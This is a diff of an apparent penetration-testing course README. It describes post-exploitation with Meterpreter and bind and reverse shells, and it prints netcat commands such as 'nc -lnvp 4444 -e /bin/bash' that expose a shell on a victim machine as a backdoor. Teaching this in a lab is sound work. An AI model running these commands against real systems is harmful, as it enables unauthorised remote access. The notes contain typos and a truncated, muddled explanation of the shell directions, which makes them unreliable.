Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 ## Post-Exploitation

-- Once you are able to break into a victim machine (with exploits you found with search sploit) you can run **Meterpreter** on the target or transfer `payloads`.
-The goal of the paylod is to establish a shell which intern can be **bind shell** - hacker (port) connects to victim (listener) or **reverse shell** - victim(port) connects to hacker (listener- these port openings are called **backdoor**.
+- Once you are able to break into a victim machine (which means a successful run of metasploit exploit module or manual running of python etc explot script on the `rhost < victim ip address>` ) you can run **Meterpreter** on the target or transfer `payloads`.
+The goal of the paylod is to establish a shell which intern can be **bind shell** - A port is opened on victim to which a hacker is able to connect or **reverse shell** - victim(port) connects to hacker to establish a session (These s **backdoor**).
 This step can be done without metasploit if we use `Ncat`

+- After successful exploitation, `nc` or ncat can be used to establish a backdoor

 After the exploit is successful,

-- **bind sgell**
+- **bind shell**

+- Hacker machine:  `nc <ip address of hacker> 4444` on the hacker kali linux machine, this will allow the victim to connect to hacker

- -  `nc -lnvp 4444 -e /bin/bash` This command is run on the hacker's computer, sumultaneously you will have to open a port on the victim as well by using `nc <ip address of victim> 4444`
+ - Victim Machine:  `nc -lnvp 4444 -e /bin/bash` This command is run on the victim's computer (metasploitable machine) to create a listener port

        - `-l`: Tells Ncat to listen for incoming connection.
           - `-n`: Indicates that we are listening for numeric IP addresses.